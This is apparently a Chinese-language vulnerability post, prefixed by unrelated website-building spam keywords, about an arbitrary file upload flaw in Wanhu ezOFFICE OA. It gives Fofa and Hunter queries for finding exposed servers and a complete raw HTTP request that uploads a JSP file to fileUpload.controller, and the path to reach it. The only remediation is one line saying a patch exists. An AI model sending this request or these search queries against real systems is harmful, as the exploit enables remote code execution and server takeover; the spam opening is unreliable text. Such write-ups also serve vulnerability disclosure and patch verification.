网站建设捌金手指花总二九,网站建设要注意,公司网站建设多少费用济南兴田德润评价,建设电子商务网站需要什么0x01 产品描述#xff1a; 万户OA#xff08;Office Automation#xff09;是一款企业级协同办公管理软件#xff0c;旨在为企业提供全面的办公自动化解决方案。万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器#xff0c;导致攻击者可获…0x01 产品描述 万户OAOffice Automation是一款企业级协同办公管理软件旨在为企业提供全面的办公自动化解决方案。万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器导致攻击者可获取服务器控制权限。
0x02 漏洞描述 万户OA-ezOFFICE fileUpload.controller中存在一个 任意文件上传漏洞通过这个漏洞可以操纵任意文件的写入。这意味着不法分子可以利用这个漏洞来上传任意可执行性文件用于远程系统执行、数据获取、系统接管等严重威胁系统的安全性
0x03 搜索语句
Fofaapp万户ezOFFICE协同管理平台 || app万户网络-ezOFFICE
Hunter: app.name万户 Ezoffice OA 0x04 漏洞复现
POST /defaultroot/upload/fileUpload.controller HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Type: multipart/form-data; boundaryKPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Length: 773--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Disposition: form-data; namefile; filename1.jsp
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary12345
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0-- 上传成功后拼接下列接口进行访问
http://your-ip:port/defaultroot/upload/html/2024xxxxxxxxxxxxxx.jsp 0x05 修复建议
厂商已发布补丁请及时修复
